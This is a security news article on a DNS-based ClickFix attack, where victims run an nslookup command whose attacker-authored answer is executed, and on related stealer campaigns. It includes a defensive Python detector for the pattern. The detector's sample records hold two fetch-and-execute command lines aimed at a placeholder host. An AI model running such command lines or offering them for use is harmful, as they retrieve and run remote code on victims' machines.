ClickFix 2.0: How Attackers Are Hijacking DNS to Steal Your Data
Microsoft just revealed a DNS-based attack that turns your own computer into a trap—no phishing link needed.
Microsoft disclosed a new DNS-based variation of the ClickFix social engineering tactic in which the target is talked into running an nslookup command from the Windows Run dialog, so that a malicious DNS response, rather than a link or a download, delivers the next stage.
Microsoft Defender researchers observed attackers using yet another evasion approach to the ClickFix technique: Asking targets to run a command that executes a custom DNS lookup and parses the `Name:` response to receive the next-stage payload for execution.
— Microsoft Threat Intelligence (@MsftSecIntel) February 13, 2026
The command's output is filtered down to the `Name:` line of the nslookup response, and the value on that line, which the attacker controls because the query goes to a domain whose DNS answers they author, is executed as the second-stage payload, according to Microsoft's Threat Intelligence team. Because that stage arrives inside a DNS answer rather than an HTTP download, the initial fetch sidesteps controls that only inspect web traffic. The second stage downloads a ZIP archive from "azwsappdev[.]com" containing a Python script and ModeloRAT, a Python-based remote access trojan.
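To make the mechanism concrete, here is an added example that is not part of Microsoft's write-up or of this article: it models the "extract the `Name:` line" step on a constructed nslookup output, and runs a heuristic detector over constructed process-creation records for command lines that combine an nslookup call, a filter keyed on `Name`, and a primitive that executes the filtered text. The indicator patterns, the hostnames and the sample records are assumptions made for illustration, not Microsoft's published detection logic.

```python
# Added example (not from Microsoft's write-up or the page): models the
# "parse the Name: line" step of the DNS ClickFix variant and runs a heuristic
# detector over constructed command-line telemetry. The indicator patterns and
# all sample data below are assumptions made for illustration.
import re
from typing import List, Optional

# Constructed sample of Windows nslookup output. The "Name:" line is the field
# the lure's command filters for; whoever answers the DNS query decides its value.
SAMPLE_NSLOOKUP_OUTPUT = """\
Server:  UnKnown
Address:  192.168.1.1

Non-authoritative answer:
Name:    stage2.example.invalid
Address:  203.0.113.10
"""


def extract_name_field(nslookup_output: str) -> Optional[str]:
    """Return the value of the first 'Name:' line, as a findstr/for-f filter would.

    This is the step that turns a DNS answer into a string the lure then executes.
    """
    for line in nslookup_output.splitlines():
        if line.startswith("Name:"):
            return line.split(":", 1)[1].strip()
    return None


# Heuristic indicators (assumed, not Microsoft's published logic). A hit needs
# all three: an nslookup invocation, a filter that keys on "Name", and a
# primitive that executes the filtered text. Requiring the Name filter keeps
# ordinary admin one-liners such as `for /f %i in ('nslookup host') do echo %i`
# from matching.
NSLOOKUP_RE = re.compile(r"\bnslookup(?:\.exe)?\b", re.I)
NAME_FILTER_RE = re.compile(
    r"(?:\b(?:findstr|find|select-string|sls)\b|-match)[^|&;]*\bname\b", re.I
)
EXEC_RE = re.compile(
    r"\bfor\s+/f\b|\biex\b|invoke-expression|\bcmd(?:\.exe)?\s+/c\b"
    r"|\bpowershell(?:\.exe)?\b|\bmshta(?:\.exe)?\b",
    re.I,
)


def classify_cmdline(cmdline: str) -> List[str]:
    """Return the indicator names present in a process command line."""
    hits = []
    if NSLOOKUP_RE.search(cmdline):
        hits.append("nslookup")
    if NAME_FILTER_RE.search(cmdline):
        hits.append("name_filter")
    if EXEC_RE.search(cmdline):
        hits.append("exec_primitive")
    return hits


def is_dns_clickfix(cmdline: str) -> bool:
    """True only when all three indicators co-occur in one command line."""
    return {"nslookup", "name_filter", "exec_primitive"} <= set(classify_cmdline(cmdline))


# Constructed process-creation records. A Run-dialog launch typically shows
# explorer.exe as the parent, which is worth surfacing alongside the match.
SAMPLE_EVENTS = [
    {"id": "evt-1", "parent": "cmd.exe",
     "cmdline": "nslookup www.example.com"},
    {"id": "evt-2", "parent": "explorer.exe",
     "cmdline": "cmd /c for /f \"tokens=2\" %i in "
                "('nslookup stage2.example.invalid ^| findstr Name') do %i"},
    {"id": "evt-3", "parent": "explorer.exe",
     "cmdline": "powershell -w hidden -c \"iex ((nslookup stage2.example.invalid "
                "| sls Name) -replace 'Name:','')\""},
    {"id": "evt-4", "parent": "cmd.exe",
     "cmdline": "for /f %i in ('nslookup mail.example.com') do echo %i"},
]


def find_dns_clickfix(events) -> List[str]:
    """Return ids of records whose command line matches the full pattern."""
    return [e["id"] for e in events if is_dns_clickfix(e["cmdline"])]


if __name__ == "__main__":
    print("extracted:", extract_name_field(SAMPLE_NSLOOKUP_OUTPUT))
    for e in SAMPLE_EVENTS:
        flag = "ALERT" if is_dns_clickfix(e["cmdline"]) else "ok"
        print(f"{e['id']:6} parent={e['parent']:13} {flag:5} {classify_cmdline(e['cmdline'])}")
```

In the constructed set only evt-2 and evt-3 are flagged; evt-4 shows why the `Name` filter is required, since an nslookup wrapped in `for /f` on its own is routine admin usage. In production the parent process (explorer.exe for a Run-dialog launch) and the RunMRU registry history are the natural corroborating fields to join against.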
Bitdefender reported a surge in Lumma Stealer activity via ClickFix-style fake CAPTCHA campaigns distributing CastleLoader, which checks for virtualization and security tools before launching malware. "The effectiveness of ClickFix lies in its abuse of procedural trust rather than technical vulnerabilities," Bitdefender noted.
Campaigns using ClickFix now target macOS with stealer malware like Odyssey Stealer, which exfiltrates cryptocurrency wallet data from 203 browser extensions and 18 desktop apps.
Another technique, EtherHiding, uses smart contracts on the BNB Smart Chain to host the pointer to payloads that are then fetched via GitHub, so the malicious traffic blends in with legitimate Web3 activity.
Flare reported 103 Chrome crypto extensions targeted by macOS stealers, exploiting Apple developer signatures to bypass Gatekeeper. "Cryptocurrency users disproportionately use Macs. Once seed phrases are compromised, funds disappear permanently with no recourse," Flare observed.